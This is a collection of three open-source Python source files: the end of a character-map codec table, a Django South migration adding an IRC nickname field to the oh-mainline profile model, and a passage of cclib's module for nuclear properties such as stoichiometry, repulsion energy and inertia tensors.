u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> DELETE
u'\x80' # 0x80 -> <control>
u'\x81' # 0x81 -> <control>
u'\x82' # 0x82 -> <control>
u'\x83' # 0x83 -> <control>
u'\x84' # 0x84 -> <control>
u'\x85' # 0x85 -> <control>
u'\x86' # 0x86 -> <control>
u'\x87' # 0x87 -> <control>
u'\x88' # 0x88 -> <control>
u'\x89' # 0x89 -> <control>
u'\x8a' # 0x8A -> <control>
u'\x8b' # 0x8B -> <control>
u'\x8c' # 0x8C -> <control>
u'\x8d' # 0x8D -> <control>
u'\x8e' # 0x8E -> <control>
u'\x8f' # 0x8F -> <control>
u'\x90' # 0x90 -> <control>
u'\x91' # 0x91 -> <control>
u'\x92' # 0x92 -> <control>
u'\x93' # 0x93 -> <control>
u'\x94' # 0x94 -> <control>
u'\x95' # 0x95 -> <control>
u'\x96' # 0x96 -> <control>
u'\x97' # 0x97 -> <control>
u'\x98' # 0x98 -> <control>
u'\x99' # 0x99 -> <control>
u'\x9a' # 0x9A -> <control>
u'\x9b' # 0x9B -> <control>
u'\x9c' # 0x9C -> <control>
u'\x9d' # 0x9D -> <control>
u'\x9e' # 0x9E -> <control>
u'\x9f' # 0x9F -> <control>
u'\xa0' # 0xA0 -> NO-BREAK SPACE
u'\u0126' # 0xA1 -> LATIN CAPITAL LETTER H WITH STROKE
u'\u02d8' # 0xA2 -> BREVE
u'\xa3' # 0xA3 -> POUND SIGN
u'\xa4' # 0xA4 -> CURRENCY SIGN
u'\ufffe'
u'\u0124' # 0xA6 -> LATIN CAPITAL LETTER H WITH CIRCUMFLEX
u'\xa7' # 0xA7 -> SECTION SIGN
u'\xa8' # 0xA8 -> DIAERESIS
u'\u0130' # 0xA9 -> LATIN CAPITAL LETTER I WITH DOT ABOVE
u'\u015e' # 0xAA -> LATIN CAPITAL LETTER S WITH CEDILLA
u'\u011e' # 0xAB -> LATIN CAPITAL LETTER G WITH BREVE
u'\u0134' # 0xAC -> LATIN CAPITAL LETTER J WITH CIRCUMFLEX
u'\xad' # 0xAD -> SOFT HYPHEN
u'\ufffe'
u'\u017b' # 0xAF -> LATIN CAPITAL LETTER Z WITH DOT ABOVE
u'\xb0' # 0xB0 -> DEGREE SIGN
u'\u0127' # 0xB1 -> LATIN SMALL LETTER H WITH STROKE
u'\xb2' # 0xB2 -> SUPERSCRIPT TWO
u'\xb3' # 0xB3 -> SUPERSCRIPT THREE
u'\xb4' # 0xB4 -> ACUTE ACCENT
u'\xb5' # 0xB5 -> MICRO SIGN
u'\u0125' # 0xB6 -> LATIN SMALL LETTER H WITH CIRCUMFLEX
u'\xb7' # 0xB7 -> MIDDLE DOT
u'\xb8' # 0xB8 -> CEDILLA
u'\u0131' # 0xB9 -> LATIN SMALL LETTER DOTLESS I
u'\u015f' # 0xBA -> LATIN SMALL LETTER S WITH CEDILLA
u'\u011f' # 0xBB -> LATIN SMALL LETTER G WITH BREVE
u'\u0135' # 0xBC -> LATIN SMALL LETTER J WITH CIRCUMFLEX
u'\xbd' # 0xBD -> VULGAR FRACTION ONE HALF
u'\ufffe'
u'\u017c' # 0xBF -> LATIN SMALL LETTER Z WITH DOT ABOVE
u'\xc0' # 0xC0 -> LATIN CAPITAL LETTER A WITH GRAVE
u'\xc1' # 0xC1 -> LATIN CAPITAL LETTER A WITH ACUTE
u'\xc2' # 0xC2 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
u'\ufffe'
u'\xc4' # 0xC4 -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\u010a' # 0xC5 -> LATIN CAPITAL LETTER C WITH DOT ABOVE
u'\u0108' # 0xC6 -> LATIN CAPITAL LETTER C WITH CIRCUMFLEX
u'\xc7' # 0xC7 -> LATIN CAPITAL LETTER C WITH CEDILLA
u'\xc8' # 0xC8 -> LATIN CAPITAL LETTER E WITH GRAVE
u'\xc9' # 0xC9 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\xca' # 0xCA -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
u'\xcb' # 0xCB -> LATIN CAPITAL LETTER E WITH DIAERESIS
u'\xcc' # 0xCC -> LATIN CAPITAL LETTER I WITH GRAVE
u'\xcd' # 0xCD -> LATIN CAPITAL LETTER I WITH ACUTE
u'\xce' # 0xCE -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
u'\xcf' # 0xCF -> LATIN CAPITAL LETTER I WITH DIAERESIS
u'\ufffe'
u'\xd1' # 0xD1 -> LATIN CAPITAL LETTER N WITH TILDE
u'\xd2' # 0xD2 -> LATIN CAPITAL LETTER O WITH GRAVE
u'\xd3' # 0xD3 -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xd4' # 0xD4 -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
u'\u0120' # 0xD5 -> LATIN CAPITAL LETTER G WITH DOT ABOVE
u'\xd6' # 0xD6 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xd7' # 0xD7 -> MULTIPLICATION SIGN
u'\u011c' # 0xD8 -> LATIN CAPITAL LETTER G WITH CIRCUMFLEX
u'\xd9' # 0xD9 -> LATIN CAPITAL LETTER U WITH GRAVE
u'\xda' # 0xDA -> LATIN CAPITAL LETTER U WITH ACUTE
u'\xdb' # 0xDB -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
u'\xdc' # 0xDC -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\u016c' # 0xDD -> LATIN CAPITAL LETTER U WITH BREVE
u'\u015c' # 0xDE -> LATIN CAPITAL LETTER S WITH CIRCUMFLEX
u'\xdf' # 0xDF -> LATIN SMALL LETTER SHARP S
u'\xe0' # 0xE0 -> LATIN SMALL LETTER A WITH GRAVE
u'\xe1' # 0xE1 -> LATIN SMALL LETTER A WITH ACUTE
u'\xe2' # 0xE2 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
u'\ufffe'
u'\xe4' # 0xE4 -> LATIN SMALL LETTER A WITH DIAERESIS
u'\u010b' # 0xE5 -> LATIN SMALL LETTER C WITH DOT ABOVE
u'\u0109' # 0xE6 -> LATIN SMALL LETTER C WITH CIRCUMFLEX
u'\xe7' # 0xE7 -> LATIN SMALL LETTER C WITH CEDILLA
u'\xe8' # 0xE8 -> LATIN SMALL LETTER E WITH GRAVE
u'\xe9' # 0xE9 -> LATIN SMALL LETTER E WITH ACUTE
u'\xea' # 0xEA -> LATIN SMALL LETTER E WITH CIRCUMFLEX
u'\xeb' # 0xEB -> LATIN SMALL LETTER E WITH DIAERESIS
u'\xec' # 0xEC -> LATIN SMALL LETTER I WITH GRAVE
u'\xed' # 0xED -> LATIN SMALL LETTER I WITH ACUTE
u'\xee' # 0xEE -> LATIN SMALL LETTER I WITH CIRCUMFLEX
u'\xef' # 0xEF -> LATIN SMALL LETTER I WITH DIAERESIS
u'\ufffe'
u'\xf1' # 0xF1 -> LATIN SMALL LETTER N WITH TILDE
u'\xf2' # 0xF2 -> LATIN SMALL LETTER O WITH GRAVE
u'\xf3' # 0xF3 -> LATIN SMALL LETTER O WITH ACUTE
u'\xf4' # 0xF4 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\u0121' # 0xF5 -> LATIN SMALL LETTER G WITH DOT ABOVE
u'\xf6' # 0xF6 -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf7' # 0xF7 -> DIVISION SIGN
u'\u011d' # 0xF8 -> LATIN SMALL LETTER G WITH CIRCUMFLEX
u'\xf9' # 0xF9 -> LATIN SMALL LETTER U WITH GRAVE
u'\xfa' # 0xFA -> LATIN SMALL LETTER U WITH ACUTE
u'\xfb' # 0xFB -> LATIN SMALL LETTER U WITH CIRCUMFLEX
u'\xfc' # 0xFC -> LATIN SMALL LETTER U WITH DIAERESIS
u'\u016d' # 0xFD -> LATIN SMALL LETTER U WITH BREVE
u'\u015d' # 0xFE -> LATIN SMALL LETTER S WITH CIRCUMFLEX
u'\u02d9' # 0xFF -> DOT ABOVE
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
| apache-2.0 |
heeraj123/oh-mainline | mysite/profile/migrations/0089_auto__add_field_person_irc_nick.py | 17 | 16925 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Person.irc_nick'
db.add_column('profile_person', 'irc_nick', self.gf('django.db.models.fields.CharField')(max_length=30, null=True, blank=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'Person.irc_nick'
db.delete_column('profile_person', 'irc_nick')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'customs.webresponse': {
'Meta': {'object_name': 'WebResponse'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'response_headers': ('django.db.models.fields.TextField', [], {}),
'status': ('django.db.models.fields.IntegerField', [], {}),
'text': ('django.db.models.fields.TextField', [], {}),
'url': ('django.db.models.fields.TextField', [], {})
},
'profile.citation': {
'Meta': {'object_name': 'Citation'},
'contributor_role': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'data_import_attempt': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.DataImportAttempt']", 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.utcnow'}),
'distinct_months': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'first_commit_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignored_due_to_duplicate': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'languages': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'old_summary': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True'}),
'portfolio_entry': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.PortfolioEntry']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
'profile.dataimportattempt': {
'Meta': {'object_name': 'DataImportAttempt'},
'completed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.utcnow'}),
'failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}),
'query': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'web_response': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['customs.WebResponse']", 'null': 'True'})
},
'profile.forwarder': {
'Meta': {'object_name': 'Forwarder'},
'address': ('django.db.models.fields.TextField', [], {}),
'expires_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1970, 1, 1, 0, 0)'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'stops_being_listed_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1970, 1, 1, 0, 0)'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'profile.link_person_tag': {
'Meta': {'object_name': 'Link_Person_Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Tag']"})
},
'profile.link_project_tag': {
'Meta': {'object_name': 'Link_Project_Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Tag']"})
},
'profile.link_sf_proj_dude_fm': {
'Meta': {'unique_together': "[('person', 'project')]", 'object_name': 'Link_SF_Proj_Dude_FM'},
'date_collected': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_admin': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.SourceForgePerson']"}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.SourceForgeProject']"})
},
'profile.person': {
'Meta': {'object_name': 'Person'},
'bio': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'blacklisted_repository_committers': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['profile.RepositoryCommitter']", 'symmetrical': 'False'}),
'contact_blurb': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'dont_guess_my_location': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'email_me_weekly_re_projects': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'expand_next_steps': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'gotten_name_from_ohloh': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'homepage_url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'irc_nick': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'last_polled': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1970, 1, 1, 0, 0)'}),
'location_confirmed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'location_display_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'photo': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100'}),
'photo_thumbnail': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100', 'null': 'True'}),
'photo_thumbnail_20px_wide': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100', 'null': 'True'}),
'photo_thumbnail_30px_wide': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100', 'null': 'True'}),
'show_email': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'profile.portfolioentry': {
'Meta': {'ordering': "('-sort_order', '-id')", 'object_name': 'PortfolioEntry'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.utcnow'}),
'experience_description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_archived': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"}),
'project_description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'receive_maintainer_updates': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'sort_order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'use_my_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'profile.repositorycommitter': {
'Meta': {'unique_together': "(('project', 'data_import_attempt'),)", 'object_name': 'RepositoryCommitter'},
'data_import_attempt': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.DataImportAttempt']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"})
},
'profile.sourceforgeperson': {
'Meta': {'object_name': 'SourceForgePerson'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'profile.sourceforgeproject': {
'Meta': {'object_name': 'SourceForgeProject'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'unixname': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'profile.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tag_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.TagType']"}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'profile.tagtype': {
'Meta': {'object_name': 'TagType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'profile.unsubscribetoken': {
'Meta': {'object_name': 'UnsubscribeToken'},
'created_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}),
'string': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'search.project': {
'Meta': {'object_name': 'Project'},
'cached_contributor_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True'}),
'created_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'date_icon_was_fetched_from_ohloh': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'display_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200'}),
'homepage': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'icon_for_profile': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_for_search_result': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_raw': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'icon_smaller_for_badge': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'logo_contains_name': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'modified_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
'people_who_wanna_help': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'projects_i_wanna_help'", 'symmetrical': 'False', 'to': "orm['profile.Person']"})
}
}
complete_apps = ['profile']
| agpl-3.0 |
berquist/cclib | cclib/method/nuclear.py | 3 | 7039 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2020, the cclib development team
#
# This file is part of cclib (http://cclib.github.io) and is distributed under
# the terms of the BSD 3-Clause License.
"""Calculate properties of nuclei based on data parsed by cclib."""
import logging
import numpy as np
from cclib.method.calculationmethod import Method
from cclib.parser.utils import PeriodicTable
from cclib.parser.utils import find_package
_found_periodictable = find_package("periodictable")
if _found_periodictable:
import periodictable as pt
_found_scipy = find_package("scipy")
if _found_scipy:
import scipy.constants
def _check_periodictable(found_periodictable):
if not _found_periodictable:
raise ImportError("You must install `periodictable` to use this function")
def _check_scipy(found_scipy):
if not _found_scipy:
raise ImportError("You must install `scipy` to use this function")
def get_most_abundant_isotope(element):
"""Given a `periodictable` element, return the most abundant
isotope.
"""
most_abundant_isotope = element.isotopes[0]
abundance = 0
for iso in element:
if iso.abundance > abundance:
most_abundant_isotope = iso
abundance = iso.abundance
return most_abundant_isotope
def get_isotopic_masses(charges):
"""Return the masses for the given nuclei, respresented by their
nuclear charges.
"""
_check_periodictable(_found_periodictable)
masses = []
for charge in charges:
el = pt.elements[charge]
isotope = get_most_abundant_isotope(el)
mass = isotope.mass
masses.append(mass)
return np.array(masses)
class Nuclear(Method):
"""A container for methods pertaining to atomic nuclei."""
def __init__(self, data, progress=None, loglevel=logging.INFO, logname="Log"):
self.required_attrs = ('natom','atomcoords','atomnos','charge')
super(Nuclear, self).__init__(data, progress, loglevel, logname)
def __str__(self):
"""Return a string representation of the object."""
return "Nuclear"
def __repr__(self):
"""Return a representation of the object."""
return "Nuclear"
def stoichiometry(self):
"""Return the stoichemistry of the object according to the Hill system"""
cclib_pt = PeriodicTable()
elements = [cclib_pt.element[ano] for ano in self.data.atomnos]
counts = {el: elements.count(el) for el in set(elements)}
formula = ""
elcount = lambda el, c: "%s%i" % (el, c) if c > 1 else el
if 'C' in elements:
formula += elcount('C', counts['C'])
counts.pop('C')
if 'H' in elements:
formula += elcount('H', counts['H'])
counts.pop('H')
for el, c in sorted(counts.items()):
formula += elcount(el, c)
if getattr(self.data, 'charge', 0):
magnitude = abs(self.data.charge)
sign = "+" if self.data.charge > 0 else "-"
formula += "(%s%i)" % (sign, magnitude)
return formula
def repulsion_energy(self, atomcoords_index=-1):
"""Return the nuclear repulsion energy."""
nre = 0.0
for i in range(self.data.natom):
ri = self.data.atomcoords[atomcoords_index][i]
zi = self.data.atomnos[i]
for j in range(i+1, self.data.natom):
rj = self.data.atomcoords[0][j]
zj = self.data.atomnos[j]
d = np.linalg.norm(ri-rj)
nre += zi*zj/d
return nre
def center_of_mass(self, atomcoords_index=-1):
"""Return the center of mass."""
charges = self.data.atomnos
coords = self.data.atomcoords[atomcoords_index]
masses = get_isotopic_masses(charges)
mwc = coords * masses[:, np.newaxis]
numerator = np.sum(mwc, axis=0)
denominator = np.sum(masses)
return numerator / denominator
def moment_of_inertia_tensor(self, atomcoords_index=-1):
"""Return the moment of inertia tensor."""
charges = self.data.atomnos
coords = self.data.atomcoords[atomcoords_index]
masses = get_isotopic_masses(charges)
moi_tensor = np.empty((3, 3))
moi_tensor[0][0] = np.sum(masses * (coords[:, 1]**2 + coords[:, 2]**2))
moi_tensor[1][1] = np.sum(masses * (coords[:, 0]**2 + coords[:, 2]**2))
moi_tensor[2][2] = np.sum(masses * (coords[:, 0]**2 + coords[:, 1]**2))
moi_tensor[0][1] = np.sum(masses * coords[:, 0] * coords[:, 1])
moi_tensor[0][2] = np.sum(masses * coords[:, 0] * coords[:, 2])
moi_tensor[1][2] = np.sum(masses * coords[:, 1] * coords[:, 2])
moi_tensor[1][0] = moi_tensor[0][1]
moi_tensor[2][0] = moi_tensor[0][2]
moi_tensor[2][1] = moi_tensor[1][2]
return moi_tensor
def principal_moments_of_inertia(self, units='amu_bohr_2'):
"""Return the principal moments of inertia in 3 kinds of units:
1. [amu][bohr]^2
2. [amu][angstrom]^2
3. [g][cm]^2
and the principal axes.
"""
